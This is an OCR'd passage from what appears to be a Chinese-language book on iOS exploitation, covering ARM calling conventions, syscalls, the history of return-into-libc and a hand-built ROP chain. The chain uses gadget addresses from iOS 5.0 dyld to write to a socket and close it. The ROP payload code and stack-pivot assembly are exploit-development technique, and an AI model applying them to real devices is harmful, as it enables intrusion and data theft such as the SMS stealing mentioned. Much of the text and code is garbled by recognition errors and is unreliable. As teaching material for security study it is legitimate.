适用 性 弱 ， 不 过 如 果 可 以 使 用 它 ， 大 家 就 可 以 利用 iPhone 应 用 的 Xcode 调 试 功能 直接 在 手机 上 调 
试 漏洞 攻击 程序 。 

最 后 ， 请 千 万 不 要 对 测试 环境 中 漏洞 攻击 程序 的 能 力 做 任何 假设 。 事 实 上 ，iPhone 上 的 沙 盒 
机 制 可 能 与 Mac OSX 上 的 沙 盒 机 制 不 同 。 此 外 ， 为 Phone 越狱 会 大 大 改变 它 的 底层 安全 结构 ， 因 
此 单独 对 漏洞 攻击 程序 运行 的 有 效 载荷 进行 测试 始终 是 更 好 的 选择 。 

在 第 8 章 中 大 家 将 了 解 如 何 执行 这 种 测试 。 






















































































7.9 小 结 


本 章 探究 了 iOS 上 两 种 最 常用 分 配 程序 的 内 部 机 制 。 我 们 把 Mac OS X 作 为 测试 平台 ， 完 成 了 
漏洞 攻击 所 涉及 的 大 部 分 “ 脏 活 累 活 ”。 

本 章 解 释 了 若干 种 控制 TCMalloc 和 系统 堆 的 技巧 。 具体 来 讲 , 本 章 致力 于 根据 各 种 技巧 最 适 
用 的 漏洞 类 型 来 区 分 技巧 。 大 家 看 到 了 对 较 新 版 Phone 固 件 进 行 漏洞 攻击 所 带 来 的 挑战 ， 具 体 而 
言 就 是 ASLR 为 创建 可 靠 且 可 移植 的 漏洞 攻击 程序 带 来 了 困难 。 

最 后 , 大 家 看 到 一 个 现实 存在 的 针对 iOS 3.1.3 的 MobileSafari 漏 洞 攻击 程序 示例 , 而 且 了 解 了 
在 不 产生 移植 问题 和 错误 假设 的 前 提 下 进行 精确 测试 的 策略 。 
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iOS 从 2.0 版 开始 默认 为 i0S 设 备 上 运行 的 所 有 应 用 启用 了 DEP ( Data Execution Prevention ， 数 
据 执行 保护 )。 因 此 ， 要 让 任意 代码 都 能 够 在 设备 上 执行 ， 唯 一 可 行 的 解决 方案 就 是 ROP 
( Return-Oriented Programming， 面 向 返回 的 程序 设计 )。 尽 管 这 一 技术 不 是 ARM 架 构 独 有 的 ,但 
与 ARM 架 构 相 关 的 一 些 特殊 挑战 是 值得 探讨 的 。 此 外 ， 在 其 他 平台 上 ROP 通 常 只 是 作为 禁用 非 
可 执行 位 的 枢纽 ， 与 此 不 同 的 是 ，iOS 中 整个 有 效 载荷 都 需要 借助 ROP 写 入 ， 因 为 没有 办 法 从 用 
户 空 间 禁 用 DEP 或 代码 签名 。 

因为 使 用 ROP 就 意味 着 依赖 应 用 程序 地 址 空间 中 已 经 存在 的 代码 写 和 人 有 效 载荷 , 所 以 大 家 绝 
对 有 必要 了 解 ARM 架 构 的 基础 知识 和 iOS 中 用 到 的 调用 约定 。 

本 章 会 探讨 成 功 写 人 ROP 有 效 载荷 所 需 的 概念 。 我 们 首先 描述 如 何 手动 把 已 经 存在 的 应 用 程 
序 位 相连 以 创建 连续 的 有 效 载 位 ,接着 剖析 可 以 使 该 过 程 自 动 化 的 方法 , 从 而 避免 自己 动手 完成 
搜索 并 链接 代码 位 这 种 繁重 而 枯燥 的 任务 , 之 后 展示 并 分 析 一 些 ROP 有 效 载荷 的 示例 。 这 些 示例 
在 现实 的 漏洞 攻击 程序 中 用 来 链接 多 个 漏洞 攻击 程序 , 或 是 执行 特定 的 任务 ,比如 让 手机 振动 或 
是 盗 取 SMS 数 据 库 。 

最 后 ， 本 章 讨论 了 在 考虑 到 沙 盒 限 制 与 ASLR 的 情况 下 ， 什 么 样 的 测试 情景 最 适合 iPhone 上 
的 ROP 开 发 。 


8.1 ARM 基础 知识 


ARM 是 一 种 使 用 RISC ( Reduced Instruction Set Code， 精 简 指 令 集 代码 ) 的 架构 ， 这 意味 着 
它 具 有 很 少 的 指令 和 许多 通用 寄存 器 。 事 实 上 ， 总 共有 16 个 被 标记 为 Ro~R15 的 寄存 器 。 一 般 而 
言 ， 最 后 3 个 寄存 器 具有 特殊 的 值 和 名 称 。R13 又 称 为 SP ( 栈 指针 寄存 器 )，R14 又 称 为 LR ( 链接 
寄存 器 )，R15 又 称 为 Pc ( 程序 计数 器 )。 与 x86 架 构 不 同 ， 这 些 寄存 器 全 部 是 通用 的 ， 也 就 是 说 ， 
我 们 可 以 将 任意 值 移动 到 程序 计数 器 中 并 改变 程序 流 。 同 样 ,我 们 也 可 以 从 程序 计数 器 读 出 数据 ， 
以 确定 当前 执行 的 指令 。 

ARM 具 有 两 种 执行 模式 一 一 ARM 和 Thumb。ARMv7 开 始 引 入 了 第 三 种 模式 一 一 Thumb-2。 
ARM 和 Thumb 模 式 的 主要 区 别 在 于 Thumb 指 令 是 16 位 的 (不 过 调用 操作 码 仍然 是 32 位 的 )， 而 
ARM 模 式 下 的 所 有 指令 都 是 32 位 的 。Thumb-2 指 令 是 16 位 和 32 位 兼 而 有 之 。 这 种 设计 确保 Thumb 
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模式 可 以 执行 ARM 代 码 可 以 执行 的 所 有 操作 (例如 异常 处 理 以 及 对 协 处 理 器 的 访问 )。 

为 了 让 处 理 器 知道 是 执行 的 ARM 模 式 还 是 Thumb 模 式 , 这 里 有 一 个 简单 的 约定 。 如果 执行 的 
地 址 中 最 不 重要 的 一 位 等 于 1， 处 理 机 就 是 要 执行 Thumb 模 式 ， 否 则 就 是 要 执行 ARM 模 式 。 更 正 
式 地 讲 ， 处 理 器 在 当前 程序 状态 寄存 器 ( CPSR ) 的 T 位 为 1 是 J 位 为 0 时 会 执行 Thumb 代 码 。 

ARM 和 Thumb 模 式 在 可 表达 性 上 差不多 是 等 价 的 ， 但 它们 的 助 记 符 不 同 。 分 析 ARM 处 理 器 
上 可 以 使 用 的 全 部 指令 不 是 本 章 要 做 的 事情 , 不 过 我 们 还 是 会 解析 其 中 一 些 指 令 , 因为 它们 会 在 
本 章 频 繁 出 现 。 









































8.1.1 iOS 的 调用 约定 


在 学 习 ROP 时 ， 最 重要 的 事情 就 是 理解 目标 OS 的 调用 约定 。 

iOS 使 用 了 ARM 的 标准 调用 约定 。 前 4 个 参数 是 使 用 通用 寄存 器 RO 到 R3 传 递 的 ， 而 更 多 的 参 
数 会 被 压 入 栈 中 。 返 回 值 是 存储 在 R0 寄 存 器 中 。 

ARM 指 令 集 中 有 若干 种 调用 函数 和 改变 执行 流 的 方法 。 要 做 到 这 些 ， 除 了 手动 将 程序 计数 
器 设置 为 所 选 的 值 ， 最 简单 的 方式 就 是 采用 B (分支 ) 指令 ， 该 指令 会 把 程序 计数 器 改变 成 第 一 
个 操作 数 指定 的 地 址 。 

如 果 想 要 返回 紧 随 调用 之 后 的 指令 ， 你 就 需要 BL ( 带 链 接 的 分 支 ) 指令 。 事实 上 , 它 不 仅 会 
把 程序 计数 器 置 为 由 第 一 个 操作 数 指 定 的 地 址 ， 还 会 把 返回 的 地 址 存储 到 LR 寄存 器 中 。 

如 果 要 跳 转 到 的 地 址 存储 在 寄存 器 中 , 我 们 就 可 以 使 用 Bx 指令 。 该 指令 会 在 不 存储 返回 地 址 
的 情况 下 改变 执行 流 。 

与 BL 非常 相似 ，BLX 指 令 会 执行 作为 第 一 个 操作 数 传递 并 存储 在 寄存 器 中 的 地 址 ， 并 将 返回 
的 地 址 存储 在 LR 寄存 器 中 。 

大 体 上 讲 ， 对 于 ARM 编 译 的 函数 来 说 ， 以 BX LR 结尾 返回 调用 函数 是 很 常见 的 。 函 数 也 可 以 
把 ZR 的 值 压 和 信 栈 中 ， 然 后 在 返回 时 将 其 弹出 到 PC 寄存 需 中 。 


















































8.1.2 系统 调用 的 调用 约定 


在 开发 ARM 有 效 载荷 时 ， 大 家 需要 了 解 的 另 一 个 重要 概念 是 ARM 中 ( 具体 地 讲 就 是 iOS 中 ) 
的 系统 调用 是 如 何 进行 的 。 本 书 几 位 作者 的 好 朋友 们 曾经 出 于 两 个 原因 对 系统 调用 进行 过 漏洞 攻 
击 。 首 先 , 在 不 需要 构造 进行 库 调用 时 通常 需要 的 抽象 数据 类 型 情况 下 ,他 们 允许 漏洞 攻击 程序 
执行 实用 而 强大 的 操作 。 例 如 ,考虑 一 下 从 文件 中 读数 据 这 一 简单 操作 。 大 家 可 能 会 使 用 fread () 
从 文件 读数 据 ， 并 做 下 面 这 样 的 事情 : 

fread (mybuf, sizeof (mybuf) -1, 1, filestream); 
其 中 mybuf 是 C 语 言 编写 的 缓冲 区 ，filestream 则 是 指向 FTLE 结 构 体 的 指针 。FILE 结 构 体 的 定 
义 如 下 所 示 : 


typedef struct __sFILE { 
unsigned char *_p; /* ( 某 个 ) 缓冲 区 中 当前 的 位 置 */ 
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int _r; /* 留 给 getc() 的 读 空间 */ 

int _w; /* 留 给 putc() 的 写 空间 */ 

short _flags; /* 标志 ，below; 如 果 为 0 则 该 FILE 是 空闲 的 */ 
short file; /* 如 果 是 Unix 描 述 符 ， 则 为 文件 描述 符 ， 否 则 为 -1 */ 
struct _ sbuf _bf; /* 缓冲 区 (如 果 非 NULL， 大 小 至 少 为 1 字 节 ) */ 

int _lbfsize; /* 0 或 _bf._size， 对 应 内 联 函 数 putc */ 

/* 操作 */ 

void *_cCookie; /* 传递 给 io 函数 的 cookie */ 

nt (*_close) (void *); 

int * read) (void *, char *, int); 


( 
( ( 
ftpos 七 (*_seek) (void *, fpos_t, int); 
int (* write) (void *, Const char *, int); 


/* 为 ungetc() 的 长 序列 分 隔 缓 冲 区 */ 





struct _ sbuf _ub; /* ungetc 的 缓冲 区 */ 

struct SFILEX * extra; /* 对 FILE 进 行 补充 ， 从 而 不 破坏 RBI */ 
int _ur; /* 当 _r 为 ungetc 数 据 计 数 时 ,保存 _r */ 
/* 一 些小 花招 ， 这 样 即便 malloc() 失败 也 能 满足 最 小 要 求 */ 

unsigned char _ubuf[3]; /* 保证 ungetc () 缓 冲 区 */ 

unsigned char nbuf[1]; /* 保证 getc() 缓 冲 区 */ 


/* 当 1ine 穿 越 缓冲 区 边界 时 ， 为 fgetln() 分 隔 缓 冲 区 */ 
struct sbuf _lb; /* fgetln() 的 缓冲 区 */ 


/* Unix 标 准 io 文 件 与 fseek () 上 的 内 存 块 边界 对 齐 */ 
int _blksize; /* stat.st_blksize (可 能 不 等 于 _bf._size) */ 
fpos 七 _offset; /* 当前 的 L1seek 偏 移 量 ( 见 “ 警 告 ”) 
} FILE; 
攻击 者 在 写 人 他 的 shellcode 时 可 能 需要 在 内 存 中 驻 留 OA 担 这 往往 是 烦琐 而 且 
并 非 真正 必需 的 ， 因 为 关于 文件 需要 了 解 的 信息 只 有 文件 描述 符 ， 即 一 个 整数 。 所 以 ,攻击 者 们 
以 前 倾 问 于 选择 系统 调用 : 
read(filedescription, mybuff, sizeof (mybuf) - 1) 
其 中 唯一 需要 的 信息 就 是 文件 描述 符 (一 个 整数 )。 
系统 调用 如 此 吸引 漏洞 攻击 程序 编写 者 还 有 一 个 原因 , 即 他 们 可 以 在 不 用 担心 库 加 载 地 址 和 
随机 化 的 情况 下 进行 系统 调用 。 此 外 , 不 管 往 应 用 程序 的 地 址 空间 中 加 载 了 什么 库 都 可 以 进行 系 
统 调用 。 事 实 上 ， 系 统 调 用 让 用 户 空 间 的 应 用 程序 可 以 利用 陷阱 (trap ) 调用 位 于 内 核 空 间 中 的 
代码 。 每 个 可 用 的 系统 调用 都 有 与 之 关联 的 编号 , 让 内 核 知 道 要 调用 什么 函数 。 对 于 iPhone 来 说 ， 
系统 调用 编号 是 存储 在 SDK 的 相对 路 径 /usr/include/sys/syscall.h 中 的 。 
熟悉 x86 架 构 的 人 都 知道 进行 系统 调用 的 一 般 方式 : 把 系统 调用 编导 存储 到 EAX 寄存 器 中 ， 
ee 0x80 触 发 0x80 陷 阱 〈 负责 处 理 对 系统 调用 的 调用 )。 
架构 中 的 调用 约定 是 按照 进行 普通 调用 的 方式 存储 参数 。 在 这 之 后 ， 系 统 调用 编号 会 
人 要 调用 它 就 要 用 到 汇编 指令 svc。 
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对 于 面向 返回 的 程序 设计 ， 我 们 需要 知道 库 的 地 址 ， 以 找到 有 用 的 svc 指 令 ， 因 为 一 般 来 说 
只 有 库 函 数 才 会 使 用 系统 调用 。 








8.2 ROP 简介 


虽然 现在 谈 起 ROP 时 从 们 常常 会 把 它 当 成 一 种 新 鲜 事物 , 但 其 渊源 要 追溯 到 1997 年 , 那 时 候 
一 位 被 称 为 Solar Designer 的 安全 研究 人 员 首 次 公布 了 一 个 使 用 retum-into-libc (返回 libc 中 ) 技术 
的 漏洞 攻击 程序 。 

从 1997 年 起 , 情况 已 经 发 生 了 极 大 的 变化 , 与 以 前 相 比 , 现在 的 ROP 要 复杂 得 多 、 强 大 得 多 、 
实用 得 多 。 话 虽 这 么 说 ， 但 要 彻底 理解 ROP 以 及 它 的 工作 原理 ，return-into-libc 是 个 绝 佳 的 起 点 。 

虽然 在 那 时 看 来 具有 革命 性 质 ， 但 Solar Designer 的 技术 背后 的 思路 其 实 非 常 简单 。 如 果 
shellcode 要 做 的 只 是 产生 shell， 而 且 为 了 做 到 这 一 点 已 径 有 库 也 数 可 用 ， 那 干 嘛 还 要 编写 额外 的 
代码 ? 它们 已 经 都 在 这 儿 了 ! 

大 家 只 需要 做 一 件 事 ， ne 数 中 并 调用 该 函数 。S$olar 
Designer 那 时 候 处 理 的 是 普通 的 栈 缓冲 区 溢出 ， 这 意味 着 他 可 以 随意 重 写 整 个 栈 的 内 容 。 攻 击 
者 传统 的 做 法 是 往 栈 里 写 人 shellcode 代 码 ， 回 这 些 shellcode 代 码 ， 以 
取得 代码 执行 权 。 

Solar Designer 的 做 法 则 不 同 , 他 放 入 栈 中 的 是 数据 而 不 是 可 执行 代码 , 这样 一 来 就 不 用 执行 
有 效 载荷 ， 而 是 直接 将 易 受 攻击 函数 的 返回 地 址 设置 为 execve () 库 函数 。 

因为 1997 年 时 x86 Linux 的 调用 约定 是 在 栈 中 传递 参数 ， 所 以 他 把 想 要 传递 给 sxecve () 的 参 
数 压 人 栈 中 ， 从 而 完成 了 漏洞 攻击 。 

图 8-1 展 示 了 那 时 候 一 般 的 栈 溢 出 漏洞 攻击 程序 与 Solar Designer 利 用 return-into-libc 编 写 的 漏 
洞 攻 击 程序 之 间 的 区 别 。 


局 部 变量 shellcode 代 码 

















































































































1 人 | 耳 HVUIAJTBtT | Suuv IvHy 
6 仿 指 针 指向 shellcode 代 码 
人 
存储 的 指令 的 指针 
易 受 攻击 函数 | 
的 参数 可 能 被 重 写 


























图 8-1 标准 漏洞 攻击 程序 与 return-into-lib-c 漏 洞 攻击 程序 的 栈 布 局 对 比 
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ROP 依 据 的 概念 是 这 样 的 , 利用 return-into-libc 技 术 不 仅 能 调 月 








重 写 但 未 使 用 









































局 部 变量 县 
指向 system () 的 指针 
存储 的 指令 指针 一 
段 的 返回 地 址 
易 受 攻击 函数 指向 /bin/bash 路 径 
的 参数 的 指针 
图 8-1 ( 续 ) 








址 空间 中 已 经 可 用 的 代码 构建 整个 有 效 载荷 和 程序 。 
要 做 到 这 一 点 ， 在 开发 有 效 载荷 时 维持 对 栈 的 控制 权 是 至 关 重 要 的 。 


事实 上 ， 只 要 攻击 者 可 以 探 人 


回 ” 指 令 


在 这 里 ， 第 一 次 调用 之 后 第 


[NE 


system() 的 参数 








捉 栈 的 布局 ,他 就 可 能 把 多 个 可 以 继续 从 其 取 回 指 














pop-pop-ret 





函数 2 的 地 址 





参数 2 





参数 1 


pop-pop-ret 





函数 1 的 地 址 














8-2 ”ROP 栈 布局 示例 


一 个 pop-pop-ret 指 令 





要 达成 攻击 者 的 目标 需要 的 话 ， 这 个 过 程 可 以 一 直 持 续 


8.2.1 


ROP 与 堆 bug 


如 果 大 家 不 熟悉 ROP， 可 外 
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技术 是 不 是 只 能 


会 想 这 一 
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序列 会 跳 转 到 栈 中 的 第 二 





有 函数 ,而且 有 可 能 根据 进程 地 


令 指针 的 “ 返 
连接 在 一 起 ， 并 因此 可 以 随心 所 和 欲 地 执行 若干 条 指令 。 来 看 图 8-2 中 所 示 的 栈 。 


函数 的 地 址 。 只 


用 于 与 栈 有 关 的 bug。 情况 不 是 这 样 的 ， 
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基本 上 我 们 总 是 有 可 能 让 栈 指针 寄存 器 指向 堆 的 位 置 。 
根据 手中 所 控制 资源 的 不 同 , 我 们 要 使 用 的 技术 也 不 同 。 不 过 所 有 的 技术 一 般 都 可 以 归结 为 
转移 栈 的 位 置 ， 直 到 它 到 达 攻击 者 控制 之 下 的 地 址 ， 或 是 将 寄存 器 的 内 容 移动 到 栈 指针 中 。 








8.2.2 手工 构造 ROP 有 效 载荷 
写 人 ROP 有 效 载荷 的 一 个 主要 阻碍 在 于 : 寻找 满足 需求 的 合适 指令 序列 要 花 很 多 的 时 间 。 从 











非常 简单 的 层面 上 讲 ， 因 为 ARM 指 令 都 是 2 字 节 或 4 字 节 对 齐 的 ， 所 以 人 们 可 以 使 用 简单 的 反 汇 


























编程 序 ， 并 利用 grep 实 用 工具 找到 它们 。 在 处 理 简单 的 有 效 载荷 时 ， 这 样 做 就 足够 了 ， 因 为 一 般 


只 需要 少量 的 指令 序列 。 本 将 囊 领 大 家 探索 这 一 过 程 , 加 深 大 家 对 构建 这 种 有 效 载荷 的 步骤 的 


理解 总 











在 iPhone 上 ， 所 有 的 系统 库 都 存储 在 day1dq_shareq_cache 这 个 巨大 的 “缓存 ”中 。 想 要 查 
找 自己 需要 的 指令 , 我 们 首先 就 要 把 库 从 这 个 共享 缓存 中 提取 出 来 。 要 做 到 这 一 点 , 大 家 会 用 到 
dyld_decache 工 具 , 该 工具 参见 https://github.com/kennytm/Miscellaneous。 在 这 里 ,大 家 可 以 看 
到 如 何在 挂 接 了 已 解密 文件 系统 ( 相对 路 径 ) 的 Mac OS X 上 导出 1ibsystem: 


./dyld decache -f libSystem 
System/Library/Caches/com.apple.dyld/dyld_ shared cache armv7 


要 在 地 址 空间 中 找到 合适 的 工具 , 攻击 者 还 可 以 从 动态 链接 器 和 应 用 程序 的 主 二 进 制 文件 下 


手 。 其 中 ， 


前 者 名 为 ay19， 位 于 /usr/lib/dyld， 而 后 者 通常 就 在 应 用 程序 包 中 。 


要 写 人 ROP 有 效 载荷 ， 首 先 要 执行 一 项 简单 的 操作 ， 比 如 向 已 经 开放 的 使 用 了 ROP 的 套 接 字 
写 人 一 个 单词 。 以 下 C 语 言 代 码 就 是 大 家 要 用 ROP 模 仿 的 : 








ehar gtr[l|] 三 "TEST"y 
write(sock, str, 4); 
close(sock); 





当 大 家 编译 这 段 代码 时 ， 就 会 得 到 以 下 ARM 汇 编 代码 段 : 
































text:0000307C LDR.W RO, [R7,#0x84+sock] ; int 
_ text:00003080 LDR.W R1, [R7,#0x84+testString] ; 
VOLd * 

_ text:00003084 LDR.W R2, [R7,#0x84+var_EC] ; Size 七 

_ text:00003088 BLX write 

_ text:0000308C STR.W RO, [RY7,#0x84+var_F4] 

text:00003090 LDR.W RO, [R7,#0x84+sock] ; int 

text:00003094 BLX close 

不 出 所 料 ,， 这 里 的 有 效 载荷 真是 微不足道 ， 编 译 器 利用 栈 存储 write() 的 返回 值 ， 而 该 函数 
是 从 该 栈 中 读 取 所 有 必要 的 参数 。 


现在 已 经 有 了 大 致 的 代码 框架 ， 可 能 还 需要 进行 一 些 调 整 ， 以 使 从 ARM 汇 编 到 ROP 的 转换 
过 程 尽 可 能 地 简单 方便 。 大 家 可 以 假设 sock 描 述 符 在 R6 中 : 


MOV R1, $0x54534554 
STR R1, [SP, #0] 
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STR R1, SP 
MOV R1, SP 
MOV R2, #4 
MOV RO, R6 
BLX _write 
MOV RO, R6 


BLX _close 
在 该 有 效 载荷 中 , 大 家 尽 可 能 多 地 利用 了 栈 。 其 实 ， 因 为 有 了 ROP， 栈 处 在 攻击 者 的 控制 之 
下 ， 所 以 这 样 构造 shellcode 代 码 就 让 攻击 者 可 以 减少 要 寻找 的 指令 片段 ， 因 为 可 以 直接 控制 栈 的 
内 容 , 这 样 栈 中 的 所 有 存储 操作 都 不 需要 进行 了 。 另 一 个 重要 的 区 别 在 于 大 家 可 以 保存 需要 的 引 
用 (例如 套 接 字 ) 到 未 使 用 的 通用 寄存 器 ， 尽 可 能 地 避免 改变 栈 的 内 容 和 布局 。 
本 例 中 使 用 了 iOS 5.0 中 的 动态 链接 器 ayld 来 创建 ROP 有 效 载荷 。 出 于 以 下 3 个 原因 ， 选 择 
dy1dq 是 很 重要 的 : 
口 它 会 被 加 载 到 每 个 应 用 程序 的 地 址 空间 中 ; 
口 它 包 含 了 很 多 库 函 数 ; 
口 除非 应 用 程序 的 主 二 进 制 文件 是 随机 排列 的 (也 就 是 在 编译 时 使 用 了 MH_PIE 标 志 ), 否则 
dy1gd 不 会 是 随机 排列 的 。 
要 测试 该 ROP 有 效 载荷 ,这 个 简单 的 应 用 程序 会 连接 到 远程 服务 顺 , 并 把 该 有 效 载 答 存储 在 
缓冲 区 中 : 


int main(int argc, char *argv[]) 


{ 













































































int sock; 

struct sockaddr_in echoServAgddr; 

sock = socket (PF_INET, SOCK_STREAM, 0); 

memset (&echoServAddr, 0, sizeof (echoServAddr)); 
echoServAddr.sin family = AF_INET; 

echoServAddr.sin addr.s_addr = inet addr("192.168.0.3"); 
echoServAddr.sin port = htons(1444); 

connect (sock, (struct sockaddr *)&echoServAddr, sizeof (echoServAddr)); 
DebugBreak (); 

unsigned int *payload = malloc(300); 

TN = Os 


要 运行 这 段 shellcode 代 码 ， 大 家 需要 使 用 一 小 段 汇编 代码 把 sock 变 量 复制 到 R6 寄 存 器 中 ， 
以 满足 之 前 所 作 的 假设 。 随 后 ,大 家 要 把 栈 指针 指向 有 效 载荷 变量 ， 这 个 变量 中 含有 大 家 用 ROP 
指令 片段 构造 的 栈 。 最 后 ,为 了 执行 代码 , 大 家 需要 自 新 设置 的 栈 指 针 处 对 程序 计数 器 执行 出 栈 
操作 : 





























_asm _ volatile _ ("mov sp, ®%0\n\t" 
"mov r6, %1\n\t" 
"pop {pc}" 
:"m" (payload), "m" (sock) 


); 
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第 一 串 ROP 指 令 片 段 的 目标 是 把 R6 存 储 到 Ro 中 。 要 做 到 这 一 点 ， 我 们 执行 了 以 下 指令 : 





payload[i] = 0x2fe15f81; //2fe15f80 GE 大 CC 
i+++; 
payload[i] = 0x0; //rl1 
i++; 
payload[i] = 0x2fe05bc9; //r2 2fe05bc9 bdea pop {rl1l, r3, r5, r6, r7, pc} 
i++; 
payload[i] = 0x0; //r4 
i++; 
payload[i] = 0x0; //r7 
i++; 
payload[i] = 0x2fe0cc91; //pc, 
/* 4630 mov r0, r6 
4790 blx 下 2 
Blx 将 跳 转 到 2fe05bc9 











4 

现在 大 家 要 把 RO 存储 到 R8 中 ， 这 样 一 来 ， 需 要 调用 write () 时 很 容易 取 回 sock 描 述 符 : 
i++; 

payload[i] = 0x0; //rl1 

i++; 

payload[i] = 0x2fe0cc31; //r3 

i++; 

payload[il] = 0x0; //r5 

i++; 

payload[il] = 0x0; //r6 

i++; 

payload[i] = 0x0; //r7 

i++; 

payload[i] = 0x2fe114e7; //pc 

/* 

2fe114e6 aa01 add r2, sp, #4 
2fe114e8 4798 blx r3 


r2 将 指向 当前 的 栈 指针 + 4。blx 会 跳 转 到 0x2fe0cc31 





2fe0cc30 4680 mov r8, r0 
2fe0cc32 4630 mov EO, £6 
2fe0cc34 f8d220c0 ldr.w r2, [r2, #192] 
2feocc38 790 blx r2 

六 

++; 


payload[i + (4 + 192)/4 = 0x2fe05bc9; 
/* 这 被 前 面 的 指令 片段 用 来 获取 r2 要 跳 转 到 的 有 效 地 址 : 
2fe05bc8 bdea pop {EE] ,EE3;. E55 .B67 DE 
大 
/ 


最 后 一 步 是 把 R2 置 为 4， 这 个 值 是 想 要 写 和 人 的 字符 串 的 大 小 。 将 R1 指 向 栈 中 含有 "TEST" 字 
符 串 的 位 置 并 调用 write() : 


i++; 
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payload[i] = 0x0; //rl 

工 + 十 ， 

payload[1I] = 0x2fe0b7d5; //r3 bdf0 pop {r4, r5, r6, r7, pc} 
工 + 十 ， 

payload[i] = 0x0; //r5 

工 + 十 ， 

payload[i] = 0x0; //r6 

i++; 

payload[i] = 0x2fe00040; // 该 指针 指向 的 值 + 12 就 是 4， 是 我 们 想 要 写 入 的 字符 串 的 大 小 
工 ++ 

payload[i] = 0x2fe0f4c5; //pc 

/* 

2fe0f4c4 a903 add rl, sp, #12 
2fe0f4c6 4640 mov 0 Ee 
2fe0f4c8 68fa lgdr r2, [r7, #12] 
2fe0f4ca 4798 了 工区 基本 

z1 将 指向 该 字符 串 ， L0 指 向 sock 变 量 ， 而 2 指向 4 

*/ 

i++; 

payload[i] = 0x2fe1ld730; //r4,_write() 的 地 址 

i++; 

payload[i] = 0x0; //r5 

工 + 十 ， 

payload[1I] = 0x0; //r6 

i++; 

payload[i] = 0x54534554; //r7 指向 "TEST" ， 但 这 并 不 是 什么 好 事 。 只 有 TI1 需 要 指向 这 里 。 这 就 

是 个 副作用 而 已 

i++; 

payload[i] = 0x2fe076d3; //pc 

/* 

2fe076d2 47a0 了 工区 r4 

2fe076d4 bp003 add sp, #12 
2fe076d6 bqd90 pop {A 



































调用 close() 的 过 程 几 乎 是 如 出 一 轨 ， 只 是 Ro 需 要 置 为 sock 撒 述 符 (但 该 描述 符 仍 然 存储 
在 R8 中 ); 











payload[i] = 0x0; // 未 使 用 

i++; 

payload[i] = 0x0; // 未 使 用 

i++; 

payload[i] = 0x0; // 未 使 用 

i++; 

payload[i] = 0x0; //r4 

i++; 

payload[i] = 0x0; //r7 

i++; 

payload[i] = 0x2fe05bc9; //pc bdea pop {rl1, r3, r5, r6, r7, pc} 
i++; 

payload[i] = 0x0; //r1 

i++; 

payload[i] = Ox2felcf8d; //r3, bdb0 pop {r4, r5, r7, pc} 
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工 + 二 ， 

payload[i] = 0x0; //r5 

i++; 

payload[i] = 0x0; //r6 

i++; 

payload[i] = 0x2fe076d6; 

/ /任意 有 效 地 址 ， 这 样 在 从 r7 + #12 读 r2 时 不 会 引起 崩 演 

工 + 十 ， 

Payload[1i] = 0x2fe0f4c5; //pc 

/* 

2fe0f4c4 a903 add rl, sp, #12 
2fe0f4c6 4640 mov FO, 8 
2fe0f4c8 68fa ldr r2, [r7, #12] 
2fe0f4ca 4798 blx ee 

六 人 

i++; 

payload[i] = 0x2feld55c; //r4,，close() 的 地 址 

i++; 

payload[i] = 0x0; //r5 

+++; 

payload[i] = 0x0; //r7 

工 + 十 ， 

payload[i] = 0x2fe076dq3; //pc 

/* 
2fe076d2 47a0 blx r4 
2fe076dq4 b003 adqd sp,， #12 
2fe076d6 bd90 pop {r4; r7; pec} 
i++; 

payload[i] = 0x0; // 未 使 用 

i++; 

payload[i] = 0x0; // 未 使 用 

i++; 

payload[i] = 0x0; // 未 使 用 

i++; 

payload[i] = 0xcccccccc; // 有 效 载荷 的 结尾 

i++; 

payload[i] = 0xcccccccc; // 有 效 载荷 的 结尾 EE 
i++; 

payload[i] = 0xcccccccc; // 有效 载荷 的 结尾 ，pPc 在 这 里 衣 满 








在 这 个 例子 中 大 家 可 能 已 经 注意 到 , 即便 是 一 组 非常 简单 的 操作 〈 比如 向 远程 服务 器 写 数据 
并 关闭 通 向 它 的 连接 ) 在 移植 成 ROP 时 都 可 能 相当 兄长 。 当 攻击 考 手头 可 以 使 用 的 指令 非常 有 限 
时 这 一 情况 尤为 突出 。 

8.2.3 广 会 讨论 若干 种 把 寻找 并 连接 指令 序列 的 过 程 目 动 化 的 策略 。 


8.2.3 ROP 有 效 载荷 构造 过 程 的 自动 化 


现在 应 该 已 经 相当 明确 了 ， 手 工 查 找 合适 指令 的 过 程 是 个 很 麻烦 而 且 可 能 很 费时 间 的 过 程 。 
过 去 几 年 间 已 经 出 现 了 很 多 种 自动 化 该 过 程 的 方式 。 
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Komau 给 出 了 一 种 虽然 资源 密集 但 也 最 为 完善 的 方法 ， 参 见 http://static.googleusercontent. 
com/external content/untrusted dlcp/www.zynamics.com/en//downloads/kornau-tim--diplomarbeit--rop.pdf。 

这 种 方法 背后 的 思路 要 遵循 若干 步 又 。 首 先 ， 因 为 任何 汇编 指令 集 往往 都 含有 丰富 的 指令 ， 
而 且 每 一 条 指令 每 次 可 以 执行 多 项 操作 ， 所 以 最 好 是 有 办 法 减少 要 考虑 的 指令 的 数量 。 

为 此 , 每 个 二 进 制 文件 首先 都 会 被 转换 成 某 种 指令 更 少 的 中 间 语 言 , 其 中 每 一 条 新 指令 都 只 
会 执行 一 项 操作 。 

一 旦 二 进 制 文件 通过 某 种 本 章 没有 介绍 的 算法 转换 成 这 种 中 间 语 言 , 我 们 就 有 可 能 把 一 组 指 
令 连 接 起 来 。 这样 的 指令 序列 常 称 为 指令 片段 (gadget )。 每 个 指令 片段 都 有 特定 的 用 例 , 例如 有 
的 指令 片段 可 用 来 把 一 个 寄存 器 的 内 容 移动 到 另 一 个 寄存 器 ， 有 的 指令 片段 则 用 于 执行 系统 调 
用 。 当 然 ， 攻 击 者 不 能 指望 自己 会 在 二 进 制 文件 中 找到 刚好 满足 自己 需求 的 东西 。 因 此 ， 指 令 片 
段 除 了 会 执行 完成 特定 任务 所 需 的 操作 , 还 可 能 会 执行 其 他 的 操作 。 这 些 额 外 的 操作 叫 作 附 加 效 
果 (side effect )。 

在 这 个 阶段 , 攻击 者 已 经 拥有 从 给 定 的 二 进 制 文 件 中 能 找到 的 全 部 指令 片段 了 。 不 过 这 是 不 
够 的 ， 因 为 把 这 些 指 令 片 段 结 合 起 来 创建 有 意义 的 有 效 载荷 也 是 非常 费时 的 。 

正如 之 前 解释 过 的 , 每 个 指令 片段 都 有 附加 效果 , 而且 在 写 人 有效 载荷 时 也 要 把 这 些 附加 效 
果 考 虑 进来 。 例 如 ， 基 个 执行 系统 调用 的 指令 片段 也 可 能 有 上 毁 掉 寄存 器 内 容 的 效果 。 如 果 需 要 让 
